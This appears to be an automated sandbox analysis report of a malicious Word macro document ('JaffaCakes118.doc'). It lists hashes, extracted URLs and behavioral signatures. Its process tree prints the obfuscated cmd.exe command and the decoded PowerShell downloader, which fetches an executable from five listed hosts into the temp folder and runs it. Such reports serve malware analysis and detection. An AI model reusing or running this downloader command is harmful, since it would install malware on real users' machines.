Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
30-09-2024 03:13
Behavioral task
behavioral1
Sample
ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc
-
Size
126KB
-
MD5
ffd7ed2ea278afe39daf3b7f6d4819d3
-
SHA1
e7245488c6048d3a4bb0c7a49cacc1f2145330fb
-
SHA256
04ae3026fc9502f115794757e29bef4a6ad6cf3047fb7b444b0ddbed9504c631
-
SHA512
59ea97a02a17c1fe21b30dae6ebe206798943f9a8b245686420e33ac2da46f647000a67e2208eb2f63e4f7a32a7c0c76de65312dd7f9895fc74776e31468c726
-
SSDEEP
3072:A8GhDS0o9zTGOZD6EbzCd3WiWCAWcWvfxa:eoUOZDlbe3WiWCAWcWvfxa
Malware Config
Extracted
http://levifca.com/y0tYhnWQ
http://mfpvision.com/yAkPNiSmm6
http://haganelectronics.rubickdesigns.com/C96xSAAy2q
http://catairdrones.com/sMQ0n8nNun
http://radio312.com/mp0NHN4cHX
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2696 2480 cmd.exe 29 -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 5 3020 powershell.exe 10 3020 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exeWINWORD.EXEcmd.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid Process 2480 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 3020 powershell.exe 2148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3020 powershell.exe Token: SeDebugPrivilege 2148 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid Process 2480 WINWORD.EXE 2480 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exedescription pid Process procid_target PID 2480 wrote to memory of 2720 2480 WINWORD.EXE 30 PID 2480 wrote to memory of 2720 2480 WINWORD.EXE 30 PID 2480 wrote to memory of 2720 2480 WINWORD.EXE 30 PID 2480 wrote to memory of 2720 2480 WINWORD.EXE 30 PID 2480 wrote to memory of 2696 2480 WINWORD.EXE 31 PID 2480 wrote to memory of 2696 2480 WINWORD.EXE 31 PID 2480 wrote to memory of 2696 2480 WINWORD.EXE 31 PID 2480 wrote to memory of 2696 2480 WINWORD.EXE 31 PID 2696 wrote to memory of 3020 2696 cmd.exe 34 PID 2696 wrote to memory of 3020 2696 cmd.exe 34 PID 2696 wrote to memory of 3020 2696 cmd.exe 34 PID 2696 wrote to memory of 3020 2696 cmd.exe 34 PID 3020 wrote to memory of 2148 3020 powershell.exe 35 PID 3020 wrote to memory of 2148 3020 powershell.exe 35 PID 3020 wrote to memory of 2148 3020 powershell.exe 35 PID 3020 wrote to memory of 2148 3020 powershell.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2720
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /V:O/C"set lj=;'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "powershell $vYz='Fak';$mad=new-object Net.WebClient;$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@http://haganelectronics.rubickdesigns.com/C96xSAAy2q@http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}$wwd='dfa';"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Fak4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c40cfb7a24846558608d43ffc8eb2324
SHA10f3fe8cb7be0959512cc4a789cda6b04c8938998
SHA25614f039f377c70d6d8afda3868c7279238d0adec38e9712692f41a658c8ff7c32
SHA51298ef01424ffe26318ded9503faf68f3f4e8adc3db78e5e687eb314b770ee0d161a24b201d347c178bc085e360847ea35a31673d6078a6b18b708c52f6bd7648b